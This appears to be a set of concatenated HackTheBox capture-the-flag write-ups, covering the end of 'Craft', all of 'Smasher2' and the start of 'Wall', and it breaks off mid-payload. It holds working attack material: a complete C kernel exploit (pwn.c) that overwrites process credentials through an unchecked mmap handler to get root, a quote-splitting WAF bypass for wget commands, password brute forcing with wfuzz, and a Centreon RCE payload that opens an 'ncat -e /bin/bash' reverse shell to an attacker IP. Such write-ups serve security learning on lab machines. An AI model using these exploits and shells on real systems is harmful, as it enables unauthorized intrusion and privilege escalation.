drwx------ 2 gilfoyle gilfoyle 4096 Jan 3 13:31 .gnupg
-rw-r--r-- 1 gilfoyle gilfoyle 148 Feb 8 2019 .profile
drwx------ 2 gilfoyle gilfoyle 4096 Feb 9 2019 .ssh
-r-------- 1 gilfoyle gilfoyle 33 Feb 9 2019 user.txt
-rw------- 1 gilfoyle gilfoyle 36 Feb 9 2019 .vault-token
-rw------- 1 gilfoyle gilfoyle 5091 Jan 3 13:28 .viminfo
gilfoyle@craft:~$ cat .vault-token
f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
gilfoyle@craft:~$
A quick search revealed that it’s related to Vault.
Secure, store and tightly control access to tokens, passwords, certificates, encryption keys for protecting secrets and other sensitive data using a UI, CLI, or HTTP API. -vaultproject.io
By looking at vault.sh from the craft-infra repository (vault/vault.sh), we’ll see that it enables the SSH secrets engine, then creates an OTP role for root:
#!/bin/bash

# set up vault secrets backend
vault secrets enable ssh

vault write ssh/roles/root_otp \
    key_type=otp \
    default_user=root \
    cidr_list=0.0.0.0/0
We have the token (.vault-token), so we can easily authenticate to Vault and create an OTP for a root SSH session:
gilfoyle@craft:~$ vault login
Token (will be hidden):
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.
Key Value
--- -----
token f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
token_accessor 1dd7b9a1-f0f1-f230-dc76-46970deb5103
token_duration ∞
token_renewable false
token_policies ["root"]
identity_policies []
policies ["root"]
gilfoyle@craft:~$ vault write ssh/creds/root_otp ip=127.0.0.1
Key Value
--- -----
lease_id ssh/creds/root_otp/f17d03b6-552a-a90a-02b8-0932aaa20198
lease_duration 768h
lease_renewable false
ip 127.0.0.1
key c495f06b-daac-8a95-b7aa-c55618b037ee
key_type otp
port 22
username root
gilfoyle@craft:~$
And finally we’ll ssh into localhost and use the generated password (c495f06b-daac-8a95-b7aa-c55618b037ee):
gilfoyle@craft:~$ ssh [email protected]
. * .. . * *
* * @()Ooc()* o .
(Q@*0CG*O() ___
|\_________/|/ _ \
| | | | | / | |
| | | | | | | |
| | | | | | | |
| | | | | | | |
| | | | | | | |
| | | | | \_| |
| | | | |\___/
|\_|__|__|_/|
\_________/
Password:
Linux craft.htb 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 27 04:53:14 2019
root@craft:~#
And we owned root!
That’s it, feedback is appreciated!
Don’t forget to read the previous write-ups, tweet about this one if you liked it, and follow me on Twitter: @Ahm3d_H3sham
Thanks for reading.
Hey guys, today Smasher2 retired and here’s my write-up about it. Smasher2 was an interesting box and one of the hardest I have ever solved: it starts with a web application vulnerable to authentication bypass and RCE (combined with a WAF bypass), followed by a kernel module with an insecure mmap handler implementation that lets users access kernel memory. I enjoyed the box and learned a lot from it. It’s a Linux box and its IP is 10.10.10.135; I added it to /etc/hosts as smasher2.htb. Let’s jump right in!
Nmap
As always we will start with nmap to scan for open ports and services:
root@kali:~/Desktop/HTB/boxes/smasher2# nmap -sV -sT -sC -o nmapinitial smasher2.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-13 07:32 EST
Nmap scan report for smasher2.htb (10.10.10.135)
Host is up (0.18s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 23:a3:55:a8:c6:cc:74:cc:4d:c7:2c:f8:fc:20:4e:5a (RSA)
| 256 16:21:ba:ce:8c:85:62:04:2e:8c:79:fa:0e:ea:9d:33 (ECDSA)
|_ 256 00:97:93:b8:59:b5:0f:79:52:e1:8a:f1:4f:ba:ac:b4 (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.3 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.3-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.74 seconds
root@kali:~/Desktop/HTB/boxes/smasher2#
We got ssh on port 22, dns on port 53 and http on port 80.
DNS
The first thing I did was enumerate hostnames through the DNS server with a zone transfer, and I got one result:
root@kali:~/Desktop/HTB/boxes/smasher2# dig axfr smasher2.htb @10.10.10.135
; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> axfr smasher2.htb @10.10.10.135
;; global options: +cmd
smasher2.htb. 604800 IN SOA smasher2.htb. root.smasher2.htb. 41 604800 86400 2419200 604800
smasher2.htb. 604800 IN NS smasher2.htb.
smasher2.htb. 604800 IN A 127.0.0.1
smasher2.htb. 604800 IN AAAA ::1
smasher2.htb. 604800 IN PTR wonderfulsessionmanager.smasher2.htb.
smasher2.htb. 604800 IN SOA smasher2.htb. root.smasher2.htb. 41 604800 86400 2419200 604800
;; Query time: 299 msec
;; SERVER: 10.10.10.135#53(10.10.10.135)
;; WHEN: Fri Dec 13 07:36:43 EST 2019
;; XFR size: 6 records (messages 1, bytes 242)
root@kali:~/Desktop/HTB/boxes/smasher2#
wonderfulsessionmanager.smasher2.htb, I added it to my hosts file.
Web Enumeration
http://smasher2.htb had the default Apache index page:
http://wonderfulsessionmanager.smasher2.htb:
The only interesting thing here was the login page:
I kept testing it for a while, and the responses looked like this one:
It didn’t request any new pages, so I suspected it was doing an AJAX request. I intercepted the login request to find the endpoint it was requesting:
The only result that wasn’t 403 was /backup, so I checked it and found two files:
Note: months ago, when I solved this box for the first time, /backup was protected by basic HTTP authentication; that wasn’t the case when I revisited the box for the write-up, even after resetting it. I guess it got removed. However, it wasn’t an important step, just heavy brute force, so the box is better without it.
I downloaded the files to my box:
By looking at auth.py I knew that these files were related to wonderfulsessionmanager.smasher2.htb.
auth.py: Analysis
auth.py:
#!/usr/bin/env python
import ses
from flask import session, redirect, url_for, request, render_template, jsonify, Flask, send_from_directory
from threading import Lock
import hashlib
import hmac
import os
import base64
import subprocess
import time

def get_secure_key():
    m = hashlib.sha1()
    m.update(os.urandom(32))
    return m.hexdigest()

def craft_secure_token(content):
    h = hmac.new("HMACSecureKey123!", base64.b64encode(content).encode(), hashlib.sha256)
    return h.hexdigest()

lock = Lock()
app = Flask(__name__)
app.config['SECRET_KEY'] = get_secure_key()
Managers = {}

def log_creds(ip, c):
    with open("creds.log", "a") as creds:
        creds.write("Login from {} with data {}:{}\n".format(ip, c["username"], c["password"]))
        creds.close()

def safe_get_manager(id):
    lock.acquire()
    manager = Managers[id]
    lock.release()
    return manager

def safe_init_manager(id):
    lock.acquire()
    if id in Managers:
        del Managers[id]
    else:
        login = ["<REDACTED>", "<REDACTED>"]
        Managers.update({id: ses.SessionManager(login, craft_secure_token(":".join(login)))})
    lock.release()

def safe_have_manager(id):
    ret = False
    lock.acquire()
    ret = id in Managers
    lock.release()
    return ret

@app.before_request
def before_request():
    if request.path == "/":
        if not session.has_key("id"):
            k = get_secure_key()
            safe_init_manager(k)
            session["id"] = k
        elif session.has_key("id") and not safe_have_manager(session["id"]):
            del session["id"]
            return redirect("/", 302)
    else:
        if session.has_key("id") and safe_have_manager(session["id"]):
            pass
        else:
            return redirect("/", 302)

@app.after_request
def after_request(resp):
    return resp

@app.route('/assets/<path:filename>')
def base_static(filename):
    return send_from_directory(app.root_path + '/assets/', filename)

@app.route('/', methods=['GET'])
def index():
    return render_template("index.html")

@app.route('/login', methods=['GET'])
def view_login():
    return render_template("login.html")

@app.route('/auth', methods=['POST'])
def login():
    ret = {"authenticated": None, "result": None}
    manager = safe_get_manager(session["id"])
    data = request.get_json(silent=True)
    if data:
        try:
            tmp_login = dict(data["data"])
        except:
            pass
        tmp_user_login = None
        try:
            is_logged = manager.check_login(data)
            secret_token_info = ["/api/<api_key>/job", manager.secret_key, int(time.time())]
            try:
                tmp_user_login = {"username": tmp_login["username"], "password": tmp_login["password"]}
            except:
                pass
            if not is_logged[0]:
                ret["authenticated"] = False
                ret["result"] = "Cannot authenticate with data: %s - %s" % (is_logged[1], "Too many tentatives, wait 2 minutes!" if manager.blocked else "Try again!")
            else:
                if tmp_user_login is not None:
                    log_creds(request.remote_addr, tmp_user_login)
                ret["authenticated"] = True
                ret["result"] = {"endpoint": secret_token_info[0], "key": secret_token_info[1], "creation_date": secret_token_info[2]}
        except TypeError as e:
            ret["authenticated"] = False
            ret["result"] = str(e)
    else:
        ret["authenticated"] = False
        ret["result"] = "Cannot authenticate missing parameters."
    return jsonify(ret)

@app.route("/api/<key>/job", methods=['POST'])
def job(key):
    ret = {"success": None, "result": None}
    manager = safe_get_manager(session["id"])
    if manager.secret_key == key:
        data = request.get_json(silent=True)
        if data and type(data) == dict:
            if "schedule" in data:
                out = subprocess.check_output(['bash', '-c', data["schedule"]])
                ret["success"] = True
                ret["result"] = out
            else:
                ret["success"] = False
                ret["result"] = "Missing schedule parameter."
        else:
            ret["success"] = False
            ret["result"] = "Invalid value provided."
    else:
        ret["success"] = False
        ret["result"] = "Invalid token."
    return jsonify(ret)

app.run(host='127.0.0.1', port=5000)
I read the code; these are the things that interest us:
After successful authentication the server will respond with a secret key that we can use to access the endpoint /api/<key>/job:
So in theory, since the two functions are identical, providing the username as the password should work. That means it’s just a matter of finding an existing username, and we’ll be able to bypass the authentication.
I tried some common usernames before resorting to wfuzz; Administrator worked:
WAF Bypass –> RCE –> Shell as dzonerzy –> User Flag
I wrote a small script to execute commands through /api/<key>/job, as we saw earlier in auth.py; the script was meant for testing purposes:
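The original tester isn’t shown in this post; the following is a hedged sketch of what it needs, based only on the job() handler in auth.py above (the authenticated session and the key returned by /auth are assumed to be in hand):

```python
# Hypothetical sketch of the command tester -- NOT the original script.
# auth.py runs: subprocess.check_output(['bash', '-c', data["schedule"]]),
# so the request body just needs a JSON "schedule" field holding the command.
import json


def make_job_body(cmd):
    return json.dumps({"schedule": cmd})


# Live usage sketch (requires the session cookie and the key from /auth):
#   import requests
#   url = "http://wonderfulsessionmanager.smasher2.htb/api/%s/job" % key
#   r = session.post(url, headers={"Content-Type": "application/json"},
#                    data=make_job_body("id"))
#   print(r.json()["result"])
```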
However, when I tried other commands I got a 403 response, indicating that the server was protected by a WAF:
cmd: curl http://10.10.xx.xx
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /api/fe61e023b3c64d75b3965a5dd1a923e392c8baeac4ef870334fcad98e6b264f8/job
on this server.<br />
</p>
<address>Apache/2.4.29 (Ubuntu) Server at wonderfulsessionmanager.smasher2.htb Port 80</address>
</body></html>
cmd:
I could easily bypass it by inserting single quotes into the command:
cmd: 'w'g'e't 'h't't'p':'/'/'1'0'.'1'0'.'x'x'.'x'x'/'t'e's't'
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
cmd:
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.135 - - [13/Dec/2019 08:18:33] code 404, message File not found
10.10.10.135 - - [13/Dec/2019 08:18:33] "GET /test HTTP/1.1" 404 -
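This quoting trick is easy to automate. A small helper, under my assumption of the rule (quote every non-space character; bash concatenates adjacent quoted strings, so 'i''d' still runs as id while the WAF’s signatures no longer see the bare keyword):

```python
# Quote each non-space character individually so WAF keyword matching fails,
# while bash reassembles the command from the adjacent quoted fragments.
def waf_quote(cmd):
    return "".join(c if c == " " else "'%s'" % c for c in cmd)


print(waf_quote("wget http://10.10.xx.xx/test"))
```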
To automate the exploitation process, I wrote this small exploit:
I hosted it on a Python web server and started a netcat listener on port 1337, then I ran the exploit:
We owned user.
dhid.ko: Enumeration
After getting a shell, I copied my public SSH key to /home/dzonerzy/.ssh/authorized_keys and got SSH access.
In dzonerzy’s home directory there was a README containing a message from him, saying that we’ll need to think outside the box to root Smasher2:
dzonerzy@smasher2:~$ ls -al
total 44
drwxr-xr-x 6 dzonerzy dzonerzy 4096 Feb 17 2019 .
drwxr-xr-x 3 root root 4096 Feb 15 2019 ..
lrwxrwxrwx 1 dzonerzy dzonerzy 9 Feb 15 2019 .bash_history -> /dev/null
-rw-r--r-- 1 dzonerzy dzonerzy 220 Feb 15 2019 .bash_logout
-rw-r--r-- 1 dzonerzy dzonerzy 3799 Feb 16 2019 .bashrc
drwx------ 3 dzonerzy dzonerzy 4096 Feb 15 2019 .cache
drwx------ 3 dzonerzy dzonerzy 4096 Feb 15 2019 .gnupg
drwx------ 5 dzonerzy dzonerzy 4096 Feb 17 2019 .local
-rw-r--r-- 1 dzonerzy dzonerzy 807 Feb 15 2019 .profile
-rw-r--r-- 1 root root 900 Feb 16 2019 README
drwxrwxr-x 4 dzonerzy dzonerzy 4096 Dec 13 12:50 smanager
-rw-r----- 1 root dzonerzy 33 Feb 17 2019 user.txt
dzonerzy@smasher2:~$ cat README
.|'''.| '||
||.. ' .. .. .. .... .... || .. .... ... ..
''|||. || || || '' .|| ||. ' ||' || .|...|| ||' ''
. '|| || || || .|' || . '|.. || || || ||
|'....|' .|| || ||. '|..'|' |'..|' .||. ||. '|...' .||. v2.0
by DZONERZY
Ye you've come this far and I hope you've learned something new, smasher wasn't created
with the intent to be a simple puzzle game... but instead I just wanted to pass my limited
knowledge to you fellow hacker, I know it's not much but this time you'll need more than
skill, you will need to think outside the box to complete smasher 2 , have fun and happy
Hacking!
free(knowledge);
free(knowledge);
* error for object 0xd00000000b400: pointer being freed was not allocated *
dzonerzy@smasher2:~$
After some enumeration, I checked the auth log and saw this line:
I opened the module in Ghidra and started checking the functions:
The function dev_read() had a hint that this is the intended way to root the box:
long dev_read(undefined8 param_1, undefined8 param_2)
{
  int iVar1;

  __fentry__();
  iVar1 = _copy_to_user(param_2, "This is the right way, please exploit this shit!", 0x30);
  return (ulong)(-(uint)(iVar1 == 0) & 0xf) - 0xe;
}
One interesting function that caught my attention was dev_mmap():
In case you don’t know what mmap is: simply put, mmap is a system call used to map a file or a device into memory. (Check this)
The function dev_mmap() is a custom mmap handler.
The interesting part here is the call to the remap_pfn_range() function (which remaps kernel memory to userspace):
If we look at the function call again, we can see that the 3rd and 4th arguments (the physical address of the kernel memory and the size of the mapped area) are passed to the function without any prior validation:
This means that we can map any amount of memory we want and read/write to it, giving us access even to kernel memory.
dhid.ko: Exploitation –> Root Shell –> Root Flag
Luckily, this white paper covered a similar scenario and explained the exploitation process very well; I recommend reading it after finishing the write-up. I will try to explain the process as well as I can, but the paper is more detailed. In summary, we’ll map a huge amount of memory and search through it for our process’s cred structure (the cred structure holds our process credentials), then overwrite our uid and gid with 0 and execute /bin/sh. Let’s go through it step by step.
First, we need to make sure that it’s really exploitable. We’ll try to map a huge amount of memory and check if it works:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
int main(int argc, char* const* argv) {
    printf("[+] PID: %d\n", getpid());
    int fd = open("/dev/dhid", O_RDWR);
    if (fd < 0) {
        printf("[!] Open failed!\n");
        return -1;
    }
    printf("[*] Open OK fd: %d\n", fd);
    unsigned long size = 0xf0000000;
    unsigned long mmapStart = 0x42424000;
    unsigned int* addr = (unsigned int*)mmap((void*)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0);
    if (addr == MAP_FAILED) {
        perror("[!] Failed to mmap");
        close(fd);
        return -1;
    }
    printf("[*] mmap OK address: %lx\n", addr);
    int stop = getchar();
    return 0;
}
Now we can start searching for the cred structure that belongs to our process. If we take a look at how the cred structure is defined:
struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key	*session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns;	/* user_ns the caps and keyrings are relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	/* RCU deletion */
	union {
		int non_rcu;		/* Can we skip RCU deletion? */
		struct rcu_head	rcu;	/* RCU deletion hook */
	};
};
We’ll notice that the first 8 integers (our uid, gid, saved uid, saved gid, effective uid, effective gid, and the uid and gid for the virtual file system) are known to us, which gives us a reliable pattern to search for in memory:
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
These 8 integers are followed by a variable called securebits:
	unsigned	securebits;	/* SUID-less security management */
Then that variable is followed by our capabilities:
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
Since we know the first 8 integers, we can search through memory for that pattern. When we find a valid cred structure pattern, we’ll overwrite each of the 8 integers with 0 and check whether our uid changed to 0; we’ll keep doing that until we overwrite the one that belongs to our process. Then we’ll overwrite the capabilities with 0xffffffffffffffff and execute /bin/sh. Let’s implement the search for cred structures first.
To do that, we’ll get our uid with getuid():
unsigned int uid = getuid();
Then we’ll search for 8 consecutive integers equal to our uid; when we find a cred structure, we’ll print its pointer and keep searching:
Now we need to overwrite the cred structure that belongs to our process. We’ll keep overwriting every cred structure we find and checking our uid; when we overwrite the one that belongs to our process, our uid will be 0:
credIt = 0;
addr[credIt++] = 0;
addr[credIt++] = 0;
addr[credIt++] = 0;
addr[credIt++] = 0;
addr[credIt++] = 0;
addr[credIt++] = 0;
addr[credIt++] = 0;
addr[credIt++] = 0;

if (getuid() == 0) {
    printf("[*] Process cred structure found ptr: %p, crednum: %d\n", addr, credNum);
    break;
}
pwn.c:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
int main(int argc, char* const* argv) {
    printf("[+] PID: %d\n", getpid());
    int fd = open("/dev/dhid", O_RDWR);
    if (fd < 0) {
        printf("[!] Open failed!\n");
        return -1;
    }
    printf("[*] Open OK fd: %d\n", fd);
    unsigned long size = 0xf0000000;
    unsigned long mmapStart = 0x42424000;
    unsigned int* addr = (unsigned int*)mmap((void*)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0);
    if (addr == MAP_FAILED) {
        perror("Failed to mmap: ");
        close(fd);
        return -1;
    }
    printf("[*] mmap OK address: %lx\n", addr);
    unsigned int uid = getuid();
    printf("[*] Current UID: %d\n", uid);
    unsigned int credIt = 0;
    unsigned int credNum = 0;
    while (((unsigned long)addr) < (mmapStart + size - 0x40)) {
        credIt = 0;
        if (addr[credIt++] == uid && addr[credIt++] == uid &&
            addr[credIt++] == uid && addr[credIt++] == uid &&
            addr[credIt++] == uid && addr[credIt++] == uid &&
            addr[credIt++] == uid && addr[credIt++] == uid) {
            credNum++;
            printf("[*] Cred structure found! ptr: %p, crednum: %d\n", addr, credNum);
            credIt = 0;
            addr[credIt++] = 0;
            addr[credIt++] = 0;
            addr[credIt++] = 0;
            addr[credIt++] = 0;
            addr[credIt++] = 0;
            addr[credIt++] = 0;
            addr[credIt++] = 0;
            addr[credIt++] = 0;
            if (getuid() == 0) {
                printf("[*] Process cred structure found ptr: %p, crednum: %d\n", addr, credNum);
                break;
            } else {
                credIt = 0;
                addr[credIt++] = uid;
                addr[credIt++] = uid;
                addr[credIt++] = uid;
                addr[credIt++] = uid;
                addr[credIt++] = uid;
                addr[credIt++] = uid;
                addr[credIt++] = uid;
                addr[credIt++] = uid;
            }
        }
        addr++;
    }
    fflush(stdout);
    int stop = getchar();
    return 0;
}
Then I added the part that overwrites the capabilities and spawns a shell. The final pwn.c:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
int main(int argc, char* const* argv) {
    printf("\033[93m[+] PID: %d\n", getpid());
    int fd = open("/dev/dhid", O_RDWR);
    if (fd < 0) {
        printf("\033[93m[!] Open failed!\n");
        return -1;
    }
    printf("\033[32m[*] Open OK fd: %d\n", fd);
    unsigned long size = 0xf0000000;
    unsigned long mmapStart = 0x42424000;
    unsigned int* addr = (unsigned int*)mmap((void*)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0);
    if (addr == MAP_FAILED) {
        perror("\033[93m[!] Failed to mmap !");
        close(fd);
        return -1;
    }
    printf("\033[32m[*] mmap OK address: %lx\n", addr);
    unsigned int uid = getuid();
    puts("\033[93m[+] Searching for the process cred structure ...");
    unsigned int credIt = 0;
    unsigned int credNum = 0;
    while (((unsigned long)addr) < (mmapStart + size - 0x40)) {
        credIt = 0;
        if (addr[credIt++] == uid && addr[credIt++] == uid &&
            addr[credIt++] == uid && addr[credIt++] == uid &&
            addr[credIt++] == uid && addr[credIt++] == uid &&
            addr[credIt++] == uid && addr[credIt++] == uid) {
            credNum++;
            credIt = 0;
            addr[credIt++] = 0;
            addr[credIt++] = 0;
            addr[credIt++] = 0;
            addr[credIt++] = 0;
            addr[credIt++] = 0;
            addr[credIt++] = 0;
            addr[credIt++] = 0;
            addr[credIt++] = 0;
            if (getuid() == 0) {
                printf("\033[32m[*] Cred structure found ! ptr: %p, crednum: %d\n", addr, credNum);
                puts("\033[32m[*] Got Root");
                puts("\033[32m[+] Spawning a shell");
                credIt += 1;
                addr[credIt++] = 0xffffffff;
                addr[credIt++] = 0xffffffff;
                addr[credIt++] = 0xffffffff;
                addr[credIt++] = 0xffffffff;
                addr[credIt++] = 0xffffffff;
                addr[credIt++] = 0xffffffff;
                addr[credIt++] = 0xffffffff;
                addr[credIt++] = 0xffffffff;
                addr[credIt++] = 0xffffffff;
                addr[credIt++] = 0xffffffff;
                execl("/bin/sh", "-", (char*)NULL);
                puts("\033[93m[!] Execl failed...");
                break;
            } else {
                credIt = 0;
                addr[credIt++] = uid;
                addr[credIt++] = uid;
                addr[credIt++] = uid;
                addr[credIt++] = uid;
                addr[credIt++] = uid;
                addr[credIt++] = uid;
                addr[credIt++] = uid;
                addr[credIt++] = uid;
            }
        }
        addr++;
    }
    return 0;
}
And finally:
dzonerzy@smasher2:/dev/shm$ ./pwn
[+] PID: 1153
[*] Open OK fd: 3
[*] mmap OK address: 42424000
[+] Searching for the process cred structure ...
[*] Cred structure found ! ptr: 0xb60ad084, crednum: 20
[*] Got Root
[+] Spawning a shell
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare),1000(dzonerzy)
#
We owned root!
That’s it, feedback is appreciated!
Don’t forget to read the previous write-ups, tweet about this one if you liked it, and follow me on Twitter: @Ahm3d_H3sham
Thanks for reading.
Hey guys, today Wall retired and here's my write-up about it. It was an easy Linux machine with a web application vulnerable to RCE, a WAF bypass needed to exploit that vulnerability, and a vulnerable suid binary. Its IP is 10.10.10.157; I added it to /etc/hosts as wall.htb. Let's jump right in!
Nmap
As always we will start with nmap to scan for open ports and services:
root@kali:~/Desktop/HTB/boxes/wall# nmap -sV -sT -sC -o nmapinitial wall.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 13:59 EST
Nmap scan report for wall.htb (10.10.10.157)
Host is up (0.50s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2e:93:41:04:23:ed:30:50:8d:0d:58:23:de:7f:2c:15 (RSA)
| 256 4f:d5:d3:29:40:52:9e:62:58:36:11:06:72:85:1b:df (ECDSA)
|_ 256 21:64:d0:c0:ff:1a:b4:29:0b:49:e1:11:81:b6:73:66 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 241.17 seconds
root@kali:~/Desktop/HTB/boxes/wall#
We got http on port 80 and ssh on port 22. Let’s check the web service.
The only interesting thing was /monitoring; however, that path was protected by HTTP basic authentication:
I didn't have credentials. I tried bruteforcing them, but that didn't work, so I spent some time enumerating; I still couldn't find credentials anywhere. It turns out that by changing the request method from GET to POST we can bypass the authentication:
root@kali:~/Desktop/HTB/boxes/wall# curl -X POST http://wall.htb/monitoring/
<h1>This page is not ready yet !</h1>
<h2>We should redirect you to the required page !</h2>
<meta http-equiv="refresh" content="0; URL='/centreon'" />
root@kali:~/Desktop/HTB/boxes/wall#
The response was a redirection to /centreon:
Centreon is a network, system, applicative supervision and monitoring tool. -github
Bruteforcing the credentials through the login form would require writing a script because there's a CSRF token that changes on every request; alternatively, we can use the API.
According to the authentication part of the API documentation, we can send a POST request to /api/index.php?action=authenticate with the credentials. If valid credentials are provided, it responds with an authentication token; otherwise it responds with a 403.
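For reference, building that authentication request needs nothing beyond the standard library. The sketch below only constructs the request (it doesn't send it); the host and credentials are simply the values used elsewhere in this write-up:

```python
from urllib.parse import urlencode
from urllib.request import Request

def build_auth_request(base_url: str, username: str, password: str) -> Request:
    """Build (but don't send) the POST request for Centreon's authentication API."""
    body = urlencode({"username": username, "password": password}).encode()
    return Request(base_url + "/api/index.php?action=authenticate",
                   data=body, method="POST")

req = build_auth_request("http://wall.htb/centreon", "admin", "password1")
print(req.get_method(), req.full_url)
# POST http://wall.htb/centreon/api/index.php?action=authenticate
```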
I used wfuzz with darkweb2017-top10000.txt from seclists:
root@kali:~/Desktop/HTB/boxes/wall# wfuzz -c -X POST -d "username=admin&password=FUZZ" -w ./darkweb2017-top10000.txt http://wall.htb/centreon/api/index.php?action=authenticate
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://wall.htb/centreon/api/index.php?action=authenticate
Total requests: 10000
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000005: 403 0 L 2 W 17 Ch "qwerty"
000000006: 403 0 L 2 W 17 Ch "abc123"
000000008: 200 0 L 1 W 60 Ch "password1"
000000004: 403 0 L 2 W 17 Ch "password"
000000007: 403 0 L 2 W 17 Ch "12345678"
000000009: 403 0 L 2 W 17 Ch "1234567"
000000010: 403 0 L 2 W 17 Ch "123123"
000000001: 403 0 L 2 W 17 Ch "123456"
000000002: 403 0 L 2 W 17 Ch "123456789"
000000003: 403 0 L 2 W 17 Ch "111111"
000000011: 403 0 L 2 W 17 Ch "1234567890"
000000012: 403 0 L 2 W 17 Ch "000000"
000000013: 403 0 L 2 W 17 Ch "12345"
000000015: 403 0 L 2 W 17 Ch "1q2w3e4r5t"
^C
Finishing pending requests...
root@kali:~/Desktop/HTB/boxes/wall#
password1 resulted in a 200 response, so it's the right password:
RCE | WAF Bypass –> Shell as www-data
I checked the version of Centreon and it was 19.04:
It was vulnerable to RCE (CVE-2019-13024, discovered by the author of the box) and there was an exploit for it:
The script attempts to configure a poller and this is the payload that’s sent in the POST request:
payload_info = {
    "name": "Central",
    "ns_ip_address": "127.0.0.1",
    # this value should be 1 always
    "localhost[localhost]": "1",
    "is_default[is_default]": "0",
    "remote_id": "",
    "ssh_port": "22",
    "init_script": "centengine",
    # this value contains the payload , you can change it as you want
    "nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),
    "nagiostats_bin": "/usr/sbin/centenginestats",
    "nagios_perfdata": "/var/log/centreon-engine/service-perfdata",
    "centreonbroker_cfg_path": "/etc/centreon-broker",
    "centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker",
    "centreonbroker_logs_path": "",
    "centreonconnector_path": "/usr/lib64/centreon-connector",
